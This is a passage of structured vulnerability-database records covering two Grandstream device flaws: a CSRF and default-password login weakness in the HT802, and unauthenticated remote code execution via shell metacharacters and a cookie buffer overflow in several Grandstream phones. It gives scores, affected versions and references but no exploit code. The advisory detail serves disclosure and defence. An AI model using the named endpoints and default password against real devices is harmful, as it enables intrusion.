"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-0062",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ht802",
"scope": "eq",
"trust": 1.6,
"vendor": "grandstream",
"version": null
},
{
"model": "ht802",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "ht802",
"scope": null,
"trust": 0.6,
"vendor": "vonage",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ht802_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ht802:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16565"
}
]
},
"cve": "CVE-2017-16565",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-16565",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-36343",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-107500",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-16565",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-16565",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-36343",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201711-199",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-107500",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"db": "VULHUB",
"id": "VHN-107500"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-Site Request Forgery (CSRF) in /cgi-bin/login on Vonage (Grandstream) HT802 devices allows attackers to authenticate a user via the login screen using the default password of 123 and submit arbitrary requests. Vonage (Grandstream) HT802 The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Vonage (Grandstream) HT802devices is a home gateway device from Vonage, USA. A remote attacker can exploit this vulnerability to log in to the target device",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"db": "VULHUB",
"id": "VHN-107500"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-16565",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201711-199",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-36343",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-107500",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"db": "VULHUB",
"id": "VHN-107500"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
]
},
"id": "VAR-201711-0062",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"db": "VULHUB",
"id": "VHN-107500"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36343"
}
]
},
"last_update_date": "2023-12-18T13:48:28.822000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-107500"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"db": "NVD",
"id": "CVE-2017-16565"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://distributedcompute.com/2017/11/04/vonage-ht802-multiple-vulnerabilities/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16565"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16565"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"db": "VULHUB",
"id": "VHN-107500"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"db": "VULHUB",
"id": "VHN-107500"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"date": "2017-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-107500"
},
{
"date": "2017-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"date": "2017-11-06T08:29:00.313000",
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"date": "2017-11-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36343"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULHUB",
"id": "VHN-107500"
},
{
"date": "2017-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-009939"
},
{
"date": "2017-11-27T23:21:41.027000",
"db": "NVD",
"id": "CVE-2017-16565"
},
{
"date": "2017-11-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vonage HT802 Cross-site request forgery vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-009939"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-199"
}
],
"trust": 0.6
}
}
VAR-201903-1398
Vulnerability from variot - Updated: 2023-12-18 13:33Grandstream GAC2500 1.0.3.35, GXP2200 1.0.3.27, GVC3202 1.0.3.51, GXV3275 before 1.0.3.219 Beta, and GXV3240 before 1.0.3.219 Beta devices allow unauthenticated remote code execution via shell metacharacters in a /manager?action=getlogcat priority field, in conjunction with a buffer overflow (via the phonecookie cookie) to overwrite a data structure and consequently bypass authentication. This can be exploited remotely or via CSRF because the cookie can be placed in an Accept HTTP header in an XMLHttpRequest call to lighttpd. plural Grandstream The product contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GAC2500, etc. are all products of the American trend network (Grandstream). Grandstream GAC2500 is a business conference phone device based on Android platform. Grandstream GXP2200 is an IP phone. Grandstream GVC3202 is a full HD video conferencing device. A buffer error vulnerability exists in several Grandstream products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. The following products and versions are affected: Grandstream GAC2500 version 1.0.3.35; GXP2200 version 1.0.3.27; GVC3202 version 1.0.3.51; GXV3275 version before 1.0.3.219 Beta; GXV3240 version before 1.0.3.219 Beta
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-1398",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gac2500",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.35"
},
{
"model": "gxp2200",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.27"
},
{
"model": "gxv3275",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.219"
},
{
"model": "gxv3240",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.219"
},
{
"model": "gvc3202",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.51"
},
{
"model": "gac2500",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.3.35"
},
{
"model": "gvc3202",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.3.51"
},
{
"model": "gxp2200",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.3.27"
},
{
"model": "gxv3240",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.3.219 beta"
},
{
"model": "gxv3275",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.3.219 beta"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "NVD",
"id": "CVE-2019-10655"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gac2500_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.3.35",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gac2500:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gvc3202_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.3.51",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gvc3202:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxv3275_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.3.219",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxv3275:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxv3240_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.3.219",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxv3240:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp2200_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.3.27",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp2200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10655"
}
]
},
"cve": "CVE-2019-10655",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10655",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-142223",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10655",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10655",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1220",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-142223",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-142223"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "NVD",
"id": "CVE-2019-10655"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GAC2500 1.0.3.35, GXP2200 1.0.3.27, GVC3202 1.0.3.51, GXV3275 before 1.0.3.219 Beta, and GXV3240 before 1.0.3.219 Beta devices allow unauthenticated remote code execution via shell metacharacters in a /manager?action=getlogcat priority field, in conjunction with a buffer overflow (via the phonecookie cookie) to overwrite a data structure and consequently bypass authentication. This can be exploited remotely or via CSRF because the cookie can be placed in an Accept HTTP header in an XMLHttpRequest call to lighttpd. plural Grandstream The product contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GAC2500, etc. are all products of the American trend network (Grandstream). Grandstream GAC2500 is a business conference phone device based on Android platform. Grandstream GXP2200 is an IP phone. Grandstream GVC3202 is a full HD video conferencing device. A buffer error vulnerability exists in several Grandstream products. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. The following products and versions are affected: Grandstream GAC2500 version 1.0.3.35; GXP2200 version 1.0.3.27; GVC3202 version 1.0.3.51; GXV3275 version before 1.0.3.219 Beta; GXV3240 version before 1.0.3.219 Beta",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10655"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "VULHUB",
"id": "VHN-142223"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-142223",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-142223"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10655",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "165931",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "165643",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003116",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1220",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-142223",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-142223"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "NVD",
"id": "CVE-2019-10655"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
]
},
"id": "VAR-201903-1398",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-142223"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:33:32.689000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Multiple Grandstream Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90904"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
},
{
"problemtype": "CWE-352",
"trust": 1.1
},
{
"problemtype": "CWE-78",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-142223"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "NVD",
"id": "CVE-2019-10655"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl=1"
},
{
"trust": 2.3,
